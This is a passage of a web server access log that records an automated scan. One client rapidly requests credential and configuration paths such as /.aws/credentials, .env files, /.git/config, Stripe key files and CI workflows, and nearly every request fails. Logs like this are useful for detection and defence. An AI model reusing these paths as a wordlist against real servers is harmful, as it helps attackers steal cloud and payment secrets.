+[16/Jan/2026:14:29:33 +0000] 404 - GET http 92.249.249.197 "/config/application.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:33 +0000] 404 - GET http 92.249.249.197 "/config/storage.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:33 +0000] 400 - GET http 92.249.249.197 "/configs/routes-4aug.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:34 +0000] 400 - GET http 92.249.249.197 "/configs/routes.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:35 +0000] 404 - GET http 92.249.249.197 "/configs/s3_config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:35 +0000] 400 - GET http 92.249.249.197 "/controller/admin/post.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:35 +0000] 400 - GET http 92.249.249.197 "/controller/api/post.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:35 +0000] 400 - GET http 92.249.249.197 "/controllers/settings.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:36 +0000] 404 - GET http 92.249.249.197 "/getcpuutil.php-bakworking" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:36 +0000] 400 - GET http 92.249.249.197 "/helper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:37 +0000] 400 - GET http 92.249.249.197 "/helper/EmailHelper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:38 +0000] 400 - GET http 92.249.249.197 "/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:38 +0000] 200 - GET http 92.249.249.197 "/index.html" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:38 +0000] 404 - GET http 92.249.249.197 "/my_env/chakaash.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:38 +0000] 404 - GET http 92.249.249.197 "/my_env/newsletter.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:38 +0000] 404 - GET http 92.249.249.197 "/my_env/palash.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:39 +0000] 400 - GET http 92.249.249.197 "/mytest/astech_robot.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:39 +0000] 400 - GET http 92.249.249.197 "/partner/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/config/settings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/config/settings.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/.circleci/configs/development.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/config/settings.prod" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/app/config/parameters.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 404 - GET http 92.249.249.197 "/config/parameters.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:40 +0000] 400 - GET http 92.249.249.197 "/user/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:41 +0000] 400 - GET http 92.249.249.197 "/user/controllers/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/.AWS_/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/config/local.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/backend/config/settings.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/api/config/config.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/admin/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/.travis.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/aws.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/sms.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/config/config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:41 +0000] 404 - GET http 92.249.249.197 "/main.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:42 +0000] 400 - GET http 92.249.249.197 "/helpers/utility.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:42 +0000] 400 - GET http 92.249.249.197 "/server/s3.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:43 +0000] 400 - GET http 92.249.249.197 "/s3.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:44 +0000] 404 - GET http 92.249.249.197 "/debug/default/view" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:44 +0000] 404 - GET http 92.249.249.197 "/aws/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:44 +0000] 404 - GET http 92.249.249.197 "/.aws/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:44 +0000] 400 - GET http 92.249.249.197 "/config/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:44 +0000] 404 - GET http 92.249.249.197 "/config/stripe.ts" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:45 +0000] 400 - GET http 92.249.249.197 "/server/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:45 +0000] 400 - GET http 92.249.249.197 "/backend/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:46 +0000] 400 - GET http 92.249.249.197 "/api/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:47 +0000] 404 - GET http 92.249.249.197 "/api/stripe.ts" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:47 +0000] 400 - GET http 92.249.249.197 "/functions/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:48 +0000] 400 - GET http 92.249.249.197 "/functions/payment.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:49 +0000] 400 - GET http 92.249.249.197 "/routes/payment.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:49 +0000] 400 - GET http 92.249.249.197 "/routes/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:50 +0000] 400 - GET http 92.249.249.197 "/controllers/stripeController.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:51 +0000] 400 - GET http 92.249.249.197 "/utils/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:51 +0000] 400 - GET http 92.249.249.197 "/modules/stripe.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:51 +0000] 400 - GET http 92.249.249.197 "/stripe/index.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/config/services.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/config/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/app/Services/StripeService.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/app/Http/Controllers/StripeController.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/bootstrap/cache/config.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/storage/app/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/storage/app/keys/stripe.key" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/app/config/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/app/config/payment.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/config/settings/stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/settings_stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:52 +0000] 404 - GET http 92.249.249.197 "/app/settings_stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/project/settings/payment.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/core/payment.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/secrets/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/instance/config.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/initializers/stripe.rb" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/secrets.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/credentials.yml.enc" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/payment.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/stripe.yaml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/internal/stripe/keys.go" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/deploy.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/build.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.github/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.gitlab-ci.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.circleci/config.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/.bitbucket/pipelines.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:53 +0000] 404 - GET http 92.249.249.197 "/config/webhook.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:54 +0000] 400 - GET http 92.249.249.197 "/functions/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:54 +0000] 400 - GET http 92.249.249.197 "/api/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:55 +0000] 400 - GET http 92.249.249.197 "/routes/webhook.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/webhook/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/webhooks/settings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/.git/HEAD" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/composer.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/package.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/requirements.txt" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/Gemfile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/pom.xml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/.dockerignore" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/Dockerfile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/.github/workflows/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/terraform/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/.terraform/" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/docker-compose.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:55 +0000] 404 - GET http 92.249.249.197 "/Makefile" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/tox.ini" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/setup.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/gradle.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/build.gradle" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/settings.gradle" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/SonarQube.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/sonar-project.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/config/stripe.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/config/services/stripe.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/settings/stripe.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/config/credentials.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/logs/stripe.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/storage/logs/payments.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/backup/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/stripe.backup" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/stripe.old" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/stripe.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.env.stripe" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.env.production" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/terraform/stripe.tf" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/.terraform/stripe.tfstate" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:56 +0000] 404 - GET http 92.249.249.197 "/config/s3_config.json" 